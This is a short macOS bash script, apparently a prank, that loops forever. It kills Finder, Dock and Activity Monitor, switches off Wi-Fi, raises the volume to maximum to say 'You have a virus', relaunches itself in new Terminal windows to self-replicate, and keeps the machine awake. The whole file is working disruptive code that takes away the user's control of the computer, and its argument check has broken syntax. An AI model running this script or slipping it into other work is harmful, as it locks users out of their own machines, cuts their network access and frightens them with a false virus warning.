#!/bin/bash
while true; do
#Kill Finder & Dock, to make it harder to launch new applications
killall Finder
killall Dock
#Kill Activity Monitor, so you can't quit applications
killall "Activity Monitor"
#Kill wifi, just for fun
networksetup -setairportpower en1 off
#Make an error sound
osascript -e 'beep'
#Set the volume to max, then say "You have a virus"
osascript -e "set volume 7"
say You have a virus
#Self-replicate.
open -a Terminal.app ~/trollingnl
#Check if it's parent, and if it is, caffeinate computer
if [ $1 := "1" ]; then
  caffeinate
fi
done
